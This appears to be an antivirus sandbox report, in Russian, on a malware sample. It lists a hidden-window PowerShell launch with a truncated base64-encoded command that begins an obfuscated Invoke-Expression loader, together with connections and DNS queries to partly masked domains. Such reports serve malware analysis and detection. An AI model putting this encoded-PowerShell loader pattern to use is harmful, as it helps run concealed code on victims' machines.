Техническая информация
- '<SYSTEM32>\windowspowershell\v1.0\powershell.exe' -e IABpAE4AVgBPAGsARQAtAEUAWABQAHIAZQBTAHMAaQBvAE4AIAAoACAAbgBFAFcALQBvAGIAagBFAEMAdAAgAEkATwAuAEMAbwBtAHAAcgBFAFMAUwBJAE8ATgAuAGQARQBmAEwAYQB0AEUAUwB0AHIAZQBBAG0AKAAgAFsAUwBZAFMAdABlAE0ALgBJAE...
- 'cr#####untrysupply.com':443
- 'pk#.goog':80
- 'ak#######.widyakartika.ac.id':443
- 'eb#.dk':80
- http://pk#.goog/gsr1/gsr1.crt
- http://eb#.dk/_borders/cZJi/
- 'cr#####untrysupply.com':443
- 'ak#######.widyakartika.ac.id':443
- DNS ASK ha##unoi.ro
- DNS ASK cr#####untrysupply.com
- DNS ASK pk#.goog
- DNS ASK ak#######.widyakartika.ac.id
- DNS ASK gi###ocngan.com
- DNS ASK eb#.dk
- '<SYSTEM32>\windowspowershell\v1.0\powershell.exe' -e IABpAE4AVgBPAGsARQAtAEUAWABQAHIAZQBTAHMAaQBvAE4AIAAoACAAbgBFAFcALQBvAGIAagBFAEMAdAAgAEkATwAuAEMAbwBtAHAAcgBFAFMAUwBJAE8ATgAuAGQARQBmAEwAYQB0AEUAUwB0AHIAZQBBAG0AKAAgAFsAUwBZAFMAdABlAE0ALgBJAE...' (со скрытым окном)